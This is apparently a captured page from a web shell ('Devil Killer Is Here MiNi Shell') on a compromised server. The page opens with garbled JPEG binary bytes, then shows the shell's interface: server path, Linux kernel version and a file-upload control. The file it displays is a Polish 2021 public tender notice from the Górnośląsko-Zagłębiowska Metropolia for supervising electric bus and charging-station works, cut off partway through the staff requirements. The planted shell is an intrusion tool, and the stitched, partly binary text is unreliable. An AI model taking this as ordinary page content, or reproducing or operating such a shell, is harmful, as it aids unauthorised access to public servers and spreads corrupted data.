JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211231/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211231/0034168003-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi Inżyniera Kontraktu nad realizacją projektu pn. Jedziemy na prąd – zakup autobusów elektrycznych i budowa infrastruktury ładowania na obszarze Górnośląsko-Zagłębiowskiej Metropolii </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;GÓRNOŚLĄSKO - ZAGŁĘBIOWSKA METROPOLIA&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367882926</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Barbary 21A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-053</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 32/718-07-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@metropoliagzm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.metropoliagzm.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek metropolitalny</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi Inżyniera Kontraktu nad realizacją projektu pn. Jedziemy na prąd – zakup autobusów elektrycznych i budowa infrastruktury ładowania na obszarze Górnośląsko-Zagłębiowskiej Metropolii </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-59ac5b09-693a-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00341680</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001931/27/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.24 nadzór inwestorski nad robotami budowlanymi w ramach zadania &#34;Jedziemy na prąd - zakup autobusów elektrycznych i budowa infrastruktury ładowania na obszarze Górnośląsko-Zagłębiowskiej Metropolii”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja<br/>między Zamawiającym a Wykonawcą odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl,<br/>ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej zp@metropoliagzm.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Wykonawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu.<br/>3. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na<br/>miniPortalu. W szczegółach danego postępowania.<br/>4. W formularzu oferty/wniosku Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym<br/>prowadzona będzie korespondencja związana z postępowaniem.<br/>5. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w &#34;Instrukcji użytkownika&#34;<br/>stanowiącej załącznik nr 8 do SWZ.<br/>6. Wykonawca zamierzający wziąć udział w postępowaniu, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: Formularz do<br/>złożenia, zmiany, wycofania oferty lub wniosku, oraz do Formularza do komunikacji.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem Formularza złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz Formularza do komunikacji wynosi 150 MB<br/>8. Zamawiający nie dopuszcza możliwości złożenia oferty, ani żadnego dokumentu czy oświadczenia<br/>wskazanego w Rozdziale 8 SWZ składanego wraz z ofertą, przy użyciu poczty elektronicznej<br/>9. Ofertę, podmiotowe środki dowodowe, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza<br/>się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie<br/>art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne (t.j.Dz.U. z 2021 r. poz. 670 ).Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls<br/>.xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>10. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne<br/>z Załącznikiem nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r.<br/>w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych, zwanego Rozporządzeniem KRI<br/>(t.j. Dz.U. z 2017 r., poz. 2247).<br/>11. Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz<br/>informacji musi być zgody z wymaganiami określonymi<br/>w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie<br/>(Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy<br/>(Dz. U. z 2020 poz. 2415).<br/>12. Zamawiający będzie przekazywał Wykonawcom informacje poprzez zamieszczanie ich na stronie<br/>internetowej. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana z wykorzystaniem poczty elektronicznej do konkretnego<br/>Wykonawcy.<br/>13. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>udostępnianych lub przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii<br/>lub powiadomienie może trafić do folderu SPAM.<br/>14. Wiadomości przekazywane drogą elektroniczną powinny w sposób jednoznaczny wskazywać<br/>numer postępowania oraz dane identyfikujące Wykonawcę.<br/>15. Pojemność jednej wiadomości na skrzynce – do 20 MB.<br/>16. Zamawiający nie dopuszcza możliwości złożenia oferty, ani żadnego dokumentu czy oświadczenia<br/>wskazanego w Rozdziale 9 SWZ składanego wraz z ofertą, przy użyciu poczty elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego I Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (zwanym dalej RODO) informujemy, iż:<br/>1)	Administratorem Pani/Pana danych osobowych jest Górnośląsko- Zagłębiowska Metropolia, z siedzibą przy ul. Barbary 21A, 40-053 Katowice, adres email: kancelaria@metropoliagzm.pl, strona internetowa: bip.metropoliagzm.pl.<br/>2)	Wyznaczono inspektora ochrony danych, z którym można się kontaktować w sprawie przetwarzania danych osobowych pod adresem email: daneosobowe@metropoliagzm.pl.<br/>3)	Pani/Pana dane osobowe będą przetwarzane w następujących celach: <br/>a)	przeprowadzenia postępowania o udzielenie zamówienia publicznego na „Świadczenie usługi Inżyniera Kontraktu nad realizacją projektu pn. Jedziemy na prąd – zakup autobusów elektrycznych i budowa infrastruktury ładowania na obszarze Górnośląsko-Zagłębiowskiej Metropolii”, numer sprawy ZP.270.24.2021,<br/>b)	archiwizacji dokumentacji.<br/>4)	Podstawą prawną przetwarzania danych osobowych jest:<br/>a)	obowiązek prawny administratora (art. 6 ust.1 lit. c RODO) wynikający z przepisów ustawy Prawo Zamówień Publicznych (ustawy Pzp) oraz aktów wykonawczych do ustawy,<br/>b)	obowiązek ciążący na administratorze wynikający z art. 6 ustawy o narodowym zasobie archiwalnym i archiwach (art. 6 ust. 1 lit. c RODO) . <br/>5)	Pani/Pana dane osobowe będą ujawniane osobom upoważnionym przez administratora danych osobowych oraz podmiotom lub osobom upoważnionym na podstawie przepisów prawa, w szczególności w oparciu o art. 18 oraz art. 74 ustawy Pzp, podmiotom świadczącym usługi informatyczne Zamawiającemu, operatorowi pocztowemu lub kurierowi w przypadku korespondencji tradycyjnej. Ponadto w zakresie stanowiącym informację publiczną dane będą ujawniane każdemu zainteresowanemu taką informacją lub publikowane na stronach prowadzonego postępowania oraz zamieszczone w Biuletynie Zamówień Publicznych;<br/>6)	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>7)	Przysługuje Pani/Panu prawo dostępu do treści swoich danych oraz prawo żądania ich sprostowania, usunięcia lub ograniczenia przetwarzania, prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych;<br/>8)	Podanie przez Panią/Pana danych osobowych jest obowiązkowe i wynika <br/>z wymogów ustawowych. Konsekwencje niepodania danych osobowych wynikają <br/>z ustawy Pzp.<br/>9)	Pani/Pana dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji ani profilowania, o którym mowa w art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 19 ust. 4 ustawy Pzp Zamawiający informuje, że: <br/>a)	skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp,<br/>b)	wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania <br/>o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.270.24.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na pełnieniu nadzoru inwestorskiego nad realizacją projektu obejmującego dostawę 32 szt. autobusów o napędzie elektrycznym i budowę 11 szt. pantografowych stacji szybkiego ładowania (w 9 lokalizacjach) wraz z systemami zarządzania, rozliczeń poboru energii i płatności pomiędzy operatorami oraz systemami zarządzania energią w pojazdach o napędzie elektrycznym dla Górnośląsko Zagłębiowskiej Metropolii, zgodnie z obowiązującymi przepisami prawa.<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SWZ, stanowiący jej integralną część. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">79421100-2 - Usługi nadzoru nad projektem inne niż w zakresie robot budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym przez Zamawiającego w niniejszej SWZ, jest zgodna <br/>z obowiązującymi przepisami prawa oraz uzyskała maksymalną ocenę w stosunku do ustalonych przez Zamawiającego kryteriów.<br/>2.	Kryteria wyboru oferty i ich znaczenie: <br/>Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami:<br/>1	Cena brutto oferty (C) <br/>2	Metodyka (M) <br/>3	Doświadczenie personelu (D)	<br/><br/>3.	Za ofertę najkorzystniejszą uznana będzie oferta, która uzyska najwyższą całkowitą liczbę punktów. <br/><br/>Całkowita liczba punktów jakie uzyska oferta „i” będzie stanowiła sumę iloczynów ilości punktów jakie oferta uzyskała w poszczególnych kryteriach i wagi procentowej danego kryterium: <br/><br/>Pi = Pi (C) x 50% +Pi (D) x 20% + Pi (M) x 30 %<br/>Pi - łączna suma punktów<br/>Pi (C) – ilość punktów jakie otrzyma oferta “i” za kryterium Cena<br/>Pi (M) - ilość punktów jakie otrzyma oferta „i” za kryterium Metodyka<br/>Pi(D) - ilość punktów jakie otrzyma oferta „i” w kryterium Doświadczenie personelu</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Metodyka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp zamawiający określa warunki udziału w postępowaniu dotyczące: 1)sytuacji ekonomicznej lub finansowej – warunek zostanie spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia, na sumę gwarancyjną w wysokości co najmniej 300 000 PLN. 2)	zdolności technicznej lub zawodowej – warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje następującymi osobami zdolnymi do realizacji zamówienia: a)	Kierownik zespołu nadzoru inwestorskiego(nazywany również Kierownikiem zespołu Inżyniera Kontraktu) – osoba odpowiedzialna za reprezentowanie Zamawiającego w terenie przez sprawowanie kontroli nad realizacją projektu, zgodności jego realizacji z dokumentacją projektową i pozwoleniem na budowę, uzgodnieniami, przepisami oraz zasadami wiedzy technicznej. Wymagane uprawnienia budowlane do projektowania i kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Odpowiedzialny za koordynację całości prac nadzoru inwestorskiego od strony organizacyjnej, technicznej i merytorycznej, stanowiący bezpośrednie wsparcie dla Zamawiającego. Kierownik Zespołu nadzoru inwestorskiego musi legitymować się doświadczeniem na stanowisku: Kierownika Zespołu Inżyniera Kontraktu, Z-cy Kierownika Zespołu Inżyniera Kontraktu, Inżyniera Rezydenta lub Z-cy Inżyniera Rezydenta lub na innym równoważnym stanowisku w realizacji co najmniej (2) dwóch kontraktów w okresie 5 lat przed złożeniem oferty obejmujących nadzór nad realizacją zadania inwestycyjnego o wartości co najmniej 15 mln PLN (brutto) każde. Zamawiający wymaga, by powyższe zadania były doprowadzone przy udziale osoby wykazującej powyższe doświadczenie, co najmniej do wystawienia Świadectwa Przejęcia/ Protokołu odbioru robót; b)Specjalista ds. rozliczeń – osoba odpowiedzialna ze strony Wykonawcy za weryfikację i wsparcie Zamawiającego w ramach rozliczeń finansowych projektu (okresowych oraz i rozliczenia końcowego), robót objętych dofinansowaniem ze źródeł zewnętrznych, w tym weryfikacji kwalifikowalności ponoszonych wydatków, prowadzenia sprawozdawczości. Doświadczenie na podobnym stanowisku przy realizacji co najmniej (1) jednego kontraktu w okresie 5 lat przed złożeniem oferty, obejmujące nadzór nad realizacją zadania inwestycyjnego o wartości co najmniej 15 mln PLN (brutto), dofinansowanego ze środków UE (ze względu na konieczność znajomości procedur rozliczania dofinansowania ze środków UE); c)Inspektor nadzoru – w specjalności instalacyjnej zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych, osoba odpowiedzialna ze strony Wykonawcy za weryfikację, opiniowanie, sprawdzenie, akceptację i odbiór dokumentacji projektowej branży elektrycznej i elektroenergetycznej pod względem zgodności z obowiązującymi przepisami prawa oraz zgodności z Wytycznymi w zakresie kwalifikowalności wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014-2020 w związku z realizacją projektu w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego 2014-2020, nadzór i odbiory robót budowlanych wraz z przygotowaniem niezbędnych dokumentów koniecznych do uzyskanie pozwolenia na użytkowanie bądź skutecznego zgłoszenia zakończenia robót. Odpowiedzialny za sprawdzenie jakości wykonywanych prac a w szczególności zapobieganiu zastosowaniu wyrobów wadliwych i niedopuszczonych do stosowania w budownictwie, sprawdzenie i odbiór przyłączy elektrycznych i elektroenergetycznych, uczestniczenie w próbach i odbiorach technicznych instalacji urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywaniu ich do użytkowania, potwierdzanie faktycznie wykonanych prac i usunięcie wad. Osoba posiadająca uprawnienia budowlane do projektowania i kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z ustawą – Prawo Budowlane (Dz. U. z 2021 r. poz. 2351) lub równoważne. Doświadczenie na stanowisku Inspektora Nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych przy realizacji co najmniej (2) dwóch kontraktów w okresie 5 lat przed złożeniem oferty, obejmujących nadzór nad realizacją zadania inwestycyjnego o wartości w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych co najmniej 7 mln zł (brutto) każde; d) Inspektor nadzoru w specjalności inżynieryjnej drogowej – osoba odpowiedzialna ze strony Wykonawcy za weryfikację, opiniowanie, 